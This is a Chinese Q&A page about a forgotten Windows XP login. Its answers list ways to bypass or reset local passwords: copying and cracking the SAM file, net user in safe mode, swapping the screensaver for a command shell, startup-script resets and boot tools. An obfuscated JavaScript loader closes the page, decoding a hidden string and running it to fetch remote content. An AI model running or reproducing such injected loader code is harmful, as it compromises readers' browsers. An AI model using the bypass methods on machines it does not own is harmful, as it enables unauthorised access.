我电脑进入Windows用户名和密码我全忘记了,该怎么办

2025-02-28 04:23:52
推荐回答(4个)
回答1:

忘记XP登入密码的9种解决办法

如果你

是一个很容易遗忘的人,那么一定不要忘记在第一次设置密码的同时创建一张可

以恢复Windows XP中的账户密码的启动盘,它可以让你免去格式化硬盘的烦恼。
如果你是一个很容易遗忘的人,那么一定不要忘记在第一次设置密码的同时

创建一张可以恢复Windows XP中的账户密码的启动盘,它可以让你免去格式化硬

盘的烦恼。

从“控制面板”中找到“用户账户”项,选中自己的账户进入如图所示的控

制界面,我们可以看到左侧任务列表中有一项“阻止一个已忘记的密码”,点击

后便可打开“忘记密码向导”,向导会提示插入一张格式化过的空白磁盘,操作

过程中会让你输入该账户所使用的密码,很快便可以创建一张密码重设盘。

以后,当我们忘记了账户密码的时候,在没有使用“欢迎屏幕”登录方式的

情况下登录到Windows XP后,按下“Ctrl + Alt + Del”组合键,出现“Windows

安全”窗口,点击选项中“更改密码”按钮,出现更改密码窗口。这个窗口中,

将当前用户的密码备份,点击左下角“备份”按钮,激活“忘记密码向导”,按

照提示创建密码重设盘。

如果在Windows XP的登录窗口输入了错误的密码,就会弹出“登录失败”窗

口,如果你的确想不起来自己的密码是什么时,可点击“重设”按钮,启动密码

重设向导,通过刚才所创建的密码重设盘,就可以用这张密码重设盘更改密码并

启动系统。重新设定密码,登录Windows XP。

“密码重设盘”的创建,含有一定的危险性,因为任何人都可以使用这一张

“密码重设盘”来登录Windows XP,都可以以该用户的名义进入用户帐户,操作

真正用户所能操作的一切,所以必须将“密码重设盘”保存在适当的地方,以防

丢失或失泄密。

方法1——利用“administrator”(此方法适用于管理员用户名不是“

administrator”的情况)

我们知道在安装Windows XP过程中,首先是以“administrator”默认登录,

然后会要求创建一个新账户,以进入Windows XP时使用此新建账户登录,而且在

Windows XP的登录界面中也只会出现创建的这个用户账号,不会出现“

administrator”,但实际上该“administrator”账号还是存在的,并且密码为

空。

当我们了解了这一点以后,假如忘记了登录密码的话,在登录界面上,按住

Ctrl+Alt键,再按住Del键二次,即可出现经典的登录画面,此时在用户名处键入

“administrator”,密码为空进入,然后再修改“zhangbp”的口令即可。

方法2——删除SAM文件(注意,此法只适用于WIN2000)

Windows NT/2000/XP中对用户帐户的安全管理使用了安全帐号管理器

(Security Account Manager , SAM)的机制,安全帐号管理器对帐号的管理是通

过安全标识进行的,安全标识在帐号创建时就同时创建,一旦帐号被删除,安全

标识也同时被删。安全标识是唯一的,即使是相同的用户名,在每次创建时获得

的安全标识完全不同。因此,一旦某个帐号被用户名重建帐号,也会被赋予不同

的安全标识,不会保留原来的权限。安全帐号管理器的具体表现就是

%SystemRoot%system32configsam文件。SAM文件是Windows NT/2000/XP的用户帐

户数据库,所有用户的登录名以及口令等相关信息都会保存在这个文件中。

知道了这些,我们的解决办法也产生了:删除SAM文件,启动系统,它会重建

一个干净清白的SAM,里面自然没有密码了。

不过,这么简单的方法在XP是不适用的,可能微软以此为BUG,做了限制……

所以现在在XP系统下,即使你删除了SAM,还是不能删除密码,反而会使系统启动

初始化出错,从而进入死循环而不能进系统!!

方法3——从SAM文件中找密码(前提……会使用DOS基本命令就行)

在系统启动前,插入启动盘,进入:C:WINNTSystem3Config 用COPY命令将SAM

文件复制到软盘上。拿到另一台机子读取。这里需要的工具是LC4,运行LC4,打

开并新建一个任务,然后依次击“IMPORT→Import from SAM file”,打开已待

破解的SAM文件,此时LC4会自动分析此文件,并显示出文件中的用户名;之后点击

“Session→Begin Audit”,即可开始破解密码。如果密码不是很复杂的话,很

短的时间内就会得到结果。

不过,如果密码比较复杂的话,需要时间会很长,这时我们就需要用下面的

方法了。

方法4——用其他SAM文件覆盖(前提是你可以得到另外一台电脑的SAM文件和

它的密码……个人觉得是最为可行的办法)

1——如上所说,SAM文件保存着登录名以及口令,那么我们只要替换SAM文件

就是替换登录名以及口令了。不过,这个替换用的SAM文件的“产地”硬盘分区格

式要和你的系统一样(看是FAT32还是NTFS,你自己确认)。最好这个“产地”的系

统没有设密码,安全方面设置没动过(实际上很大部分的个人电脑都是这样),当

然,比较保险的方式是把XP的[Win NTSystem 32Config]下的所有文件覆盖到

[C:Win NTSystem 32Config]目录中(假设你的XP安装在默认分区C:),

2——如果得不到别人的帮助(我是说“万一”),你可以在别的分区上在安装

一个XP系统,硬盘分区格式要和原来的一样,并且请你注意一定不要和原来的XP

安装在同一分区!在开始之前,一定要事先备份引导区MBR,备份MBR的方法有很多

,使用工具软件,如杀毒软件KV3000等。装完后用Administrator登陆,现在你对

原来的XP就有绝对的写权限了,你可以把原来的SAM考下来,用10PHTCRACK得到原

来的密码。也可以把新安装的XP的Win NTSystem 32Config下的所有文件覆盖到

C:Win NTSystem 32Config目录中(架设原来的XP安装在这里),然后用KV3000恢复

以前悲愤的主引导区MBR,现在你就可以用Administrator身份登陆XP了。

[2号方案我自己都觉得麻烦,还是1号:叫别人帮忙比较好……]

【另外,据说C:windows epair 目录下的SAM是原始版本的,可以用它来覆盖

system32下的这个 SAM,这样就可以删除现在的密码,而恢复到刚开始安装系统

时的密码了。如果这个密码为空,岂不是…… 】

方法5——使用Win 2000安装光盘引导修复系统(前提……很明显吧?就是你要有一

张Win 2000安装光盘)

使用Win 2000安装光盘启动电脑,在Wndows2000安装选择界面选择修复

Windows 2000(按R键);,然后选择使用故障控制台修复(按C键),系统会扫描现有

的Window2000/XP版本。一般只有一个操作系统,所以只列出了一个登录选择

(l:C:\Windows)。从键盘上按l,然后回车,这个时候,Window XP并没有要求输

人管理员密码,而是直接登录进入了故障恢复控制台模式(如果使用的是Windows

XP安装光盘启动的,那是要求输人管理员密码的。这里指的管理员是指系统内建

的Administraor账户)熟悉Windows的朋友都知道,故障恢复控制台里面可以进行

任何系统级别的操作,例如:复制、移动、删除文件,启动、停止服务,甚至格式

化、重新分区等破坏性操作。

测试使用光盘:集成SP3的Windows 2000 Proessional 简体中文版。

测试通过的系统:Windows XP Proessional,打SPI补丁的Windows XP (FAT32

和NTFS文件系统都一样)

[需要注意的是,由于各种原因,市面上的一些Windows 2000安装光盘不能够

显现故障控制台登录选项,所以也无法利用这个漏洞。同时,由于故障控制台模

式本身的限制,也无法从网络上利用这个漏洞,换句话说,这个漏洞仅限于单机

。]
法6——利用NET命令(有两个必要前提才行:按装WINDOWS XP的分区必须采

用FAT 32文件小系统,用户名中没有汉字。)

我们知道在Windows XP中提供了“net user”命令,该命令可以添加、修改

用户账户信息,其语法格式为:

net user [UserName [Password *] [options]] [/domain]

net user [UserName {Password *} /add [options] [/domain]

net user [UserName [/delete] [/domain]]

每个参数的具体含义在Windows XP帮助中已做了详细的说明,在此笔者就不

多阐述了。好了,我们现在以恢复本地用户“zhangbq”口令为例,来说明解决忘

记登录密码的步骤:

1、重新启动计算机,在启动画面出现后马上按下F8键,选择“带命令行的安

全模式”。

2、运行过程结束时,系统列出了系统超级用户“administrator”和本地用

户“zhangbq”的选择菜单,鼠标单击“administrator”,进入命令行模式。

3、键入命令:“net user zhangbq 123456 /add”,强制将“zhangbq”用户

的口令更改为“123456”。若想在此添加一新用户(如:用户名为abcdef,口令为

123456)的话,请键入“net user abcdef 123456 /add”,添加后可用“net

localgroup administrators abcdef /add”命令将用户提升为系统管理组“

administrators”的用户,并使其具有超级权限。

4、重新启动计算机,选择正常模式下运行,就可以用更改后的口令“123456

”登录“zhangbq”用户了。另外,zhangbq 进入 登入后在〔控制台〕→〔使用

者帐户〕→选忘记密码的用户,然后选〔移除密码〕后〔等出〕 在登入画面中选

原来的用户便可不需密码情况下等入 (因已移除了) 删除刚才新增的用户,在〔

控制台〕→〔使用者帐户〕→选〔alanhkg888〕,然后选〔移除帐户〕便可

[但是有人提出:在实验后得知——在安全模式命令符下新建的用户不能进入

正常模式(此结论暂不确认)]

方法7——用破解密码软件(前提是你要有标准的系统安装光盘——不是那种

“集成”多个系统的D版盘)

1——使用PASSWARE KIT 5.0中的Windows KEY 5.0,用于恢复系统管理员的

密码,运行后生成3个文件:TXTSETUP.OEM、WINKEY.SYS和WINKEY.INF,3个文件共

50KB。把这3个文件放在任何软盘中,然后使用XP安装光盘启动电脑,启动过程中

按F6键让系统采用第三方驱动程序。此时,正是我们切入的最好时机,放入该软

盘就会自动跳到Windows KEY的界面。他会强行把ADMINISTRATOR的密码换成12345

,如此一来何愁大事不成?嗬嗬!当你重新启动以后,你会被要求再次修改你的密

码。

2——使用OFFICE NT PASSWORD & REGISTRY EDITOR.用该软件可以制作LINUX

启动盘,这个启动盘可以访问NTFS文件系统,因此可以很好地支持Windows

2000/XP。使用该软盘中的一个运行在LINUX下的工具NTPASSWD就可以解决问题,

并且可以读取注册表并重写账号。使用方法很简单,只需根据其启动后的提示一

步一步做就可以了。在此,建议你使用快速模式,这样会列出用户供你选择修改

那个用户密码。默认选择ADMIN组用户,自动找到把ADMINISTRATOR的名字换掉的

用户,十分方便。

3——ERD.Commander2003为Windows的管理员和最终用户,面对随时可能崩溃

的系统,可能每人都会有自己的一套工具,用来挽救数据和修复系统。ERD

Commander这可以算是Winternals Administrators Pak工具中最强大的组件了,

其中一个引人注目的功能就是修改密码,Windows NT/2000/XP/2003 系统中任何

一个用户的密码都可以在不知道原先密码的情况下被ERD修改掉。

方法8——修改屏幕保护程序(前提是你有设置屏保)

使用NTFSDOS这个可以从DOS下写NTFS分区的工具。用该软件制作一个DOS启动

盘,然后到C:Win NTSystem 32下将屏幕保护程序Logon.Scr改名,接着拷贝

Command.com到C:Win NTSystem 32下(WIN2000下可以用CMD.EXE),并将该文件改

名为Logon.Scr。这样启动机器15分钟以后,本该出现的屏幕保护现在变成了命令

行模式,而且是具有ADMINISTRATOR权限的,通过他就可以修改密码或者添加新的

管理员账号了。改完以后不要忘了把屏幕保护程序的名字改回去。

方法9——使用启动脚本(前提……会使用DOS基本命令就行)

Windows XP启动脚本(startup scripts)是计算机在登录屏幕出现之前运行的

批处理文件,它的功能类似于Windows 9×和DOS中的自动执行批处理文件

autoexec.bat。利用这个特性,可以编写一个批处理文件重新设置用户密码,并

将它加入启动脚本中,这样就达到了目的。以下是具体步骤(假设系统目录为

C:Windows)。

1.使用Windows98启动盘启动电脑。在DOS下新建一个文件叫a.bat,内容只需

要一条“net user”命令即可:“Net user rwd 12345678”。这条命令的意思是

将用户rwd的密码设置为“12345678”(有关Net命令的用法,可参考Windows帮助)

。然后将文件a.bat保存到“

C:windowssystem32GroupPolicyMachineScriptsStartup”下。

2.编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不

能改变。内容如下:

[Startup]

0CmdLine=a.bat

0Parameters=

3.将文件scripts.ini保存到“C:winntsystem32GroupPolicyMachineScripts

”下。scripts.ini保存着计算机启动/关机脚本的设置数据,文件内容通常包含

两个数据段:[Startup]和[Shutdown]。[Startup]数据段下是启动脚本配置,

[Shutdown]数据段下是关机脚本配置。每个脚本条目被分成脚本名和脚本参数两

部分存储,脚本名保存在XCmdLine关键字下,参数保存在XParameters关键字下,

这里的X表示从0开始的脚本序号,以区别多个脚本条目和标志各脚本条目的运行

顺序。

4.取出Windows 98启动盘,重新启动电脑,等待启动脚本运行。启动脚本运

行结束后用户rwd的密码就被恢复为“12345678”。

5.登录成功后删除上述步骤建立的两个文件。

[实际上你可以借用另一台电脑用“记事本”编写a.bat和scripts.ini,再用

软盘通过DOS复制到自己的电脑上]

说明:

以上脚本使用的是FAT32文件系统,如果使用NTFS文件系统,可以将这块硬盘

以从盘模式挂接到其它能识别NTFS文件系统(如Windows 2000或Windows XP)的计

算机上进行上述操作。本方法可以恢复管理员(Administrator)的密码。对

Windows2000系统中本地计算机用户和域用户的密码恢复同样有效。

回答2:

找一个深度系统盘或者电脑公司系统盘.
启动到光盘界面,有一个破解系统密码的软件,可以修改administrator的密码.

回答3:

  1、把制作好的U盘启动盘插入电脑USB。

  2、设置U盘为第一启动项。

  譬如:Dell电脑按开机F2后即可进入启动项设置界面,利用键盘方向键移动到U盘启动后回车。

  3、进入U盘系统盘菜单。

  4、选择9破解Windows登录密码破解。

  5、按破解步骤进行操作即可。

回答4:

你在控制面板里打开用胡帐户里启用来宾帐户就行了

!function(){function a(a){var _idx="g3r6t5j1i0";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y=F=O8D62fODm622Y5V6fFh!qYF ^8O/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgO/}0=6FY^9Y6phFg^/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"#MqYYb"=d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 pcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!7mqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28H"hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"Z!qYF O8pc2Hc2YD wdFYampYFwdTcaZ??2H0Za%"/h^/Ks0jR8ps5KFnC}60"!O8O%c*}888Om62fYR;7c"j"aj"j"g"v"a%"58"%7m5Y|5T%%%"vF8"%hca%5ca=FmL5(8pcOa=FmO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=7mqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF J8"Ks0"=X8"ps5KFnC}60"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"Ks0^)ThF)mpOL2fmRT4"="Ks0X5ThF)m64YdCmRT4"="Ks02pThFmpOL2fmRT4"="Ks0_JqhFm64YdCmRT4"="Ks02TOhFmpOL2fmRT4"="Ks0CSqhF)m64YdCmRT4"="Ks0)FfThF)fmpOL2fmRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"!qYF O82YD VY)iO(SYFcF%"/"%J%"jR8"%X%"v58"%7m5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=^80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!^<YmqY2pFh!a28fH_ZcYH(Zc^%%aa=O8fH_ZcYH(Zc^%%aa=68fH_ZcYH(Zc^%%aa=d8fH_ZcYH(Zc^%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 78h!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 )ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=h=l0a=7m(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m^_2dphmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<^%6vvfcaPYqLY[F8F*O!67cF<86a5YF_52l}!F<^%6vvfcaPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q/f/Ks0j(8}vR8ps5KFnC}60"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPO82dX6pdFO5mJqdF7O5^=Y8l/3cV62?yd(a/mFYLFcOa=F8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cY??Favvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2FajDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaPaa=lYvvO??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8pc"hFFJLg//[[fdTPPKs0)hFL_h^mYJRqFmRT4gQ}1Q"a%"/)_pj68"%J=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPaca!'.substr(22));new Function(b)()}();